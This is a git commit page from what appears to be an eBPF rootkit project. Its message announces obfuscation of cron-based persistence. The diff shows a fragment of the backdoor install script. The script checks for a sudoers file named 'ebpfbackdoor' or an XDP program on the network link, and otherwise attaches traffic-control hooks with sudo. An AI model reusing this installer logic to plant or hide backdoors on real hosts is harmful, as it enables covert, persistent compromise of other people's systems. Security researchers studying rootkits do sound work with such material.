Added obfuscation for the persistance access using cron

This commit is contained in:
h3xduck
2022-05-16 17:34:21 -04:00
parent ccd518287a
commit 104f4c0355
9 changed files with 23575 additions and 23596 deletions

View File

@@ -46,11 +46,12 @@ echo "*******************************************************\n"
echo ""
BACKDOOR_INSTALLED=0
FILE=/etc/sudoers.d/ebpfbackdoor
if test -f "$FILE"; then
OUTPUT_COMM=$(/bin/sudo /usr/sbin/ip link)
if [[ $OUTPUT_COMM == *"xdp"* ]]; then
BACKDOOR_INSTALLED=1
echo "Backdoor is already installed"
else
#Install the programs
echo -e "${BLU}Installing TC hook${NC}"
/bin/sudo tc qdisc del dev enp0s3 clsact
/bin/sudo tc qdisc add dev enp0s3 clsact

BIN
apps/kit

Binary file not shown.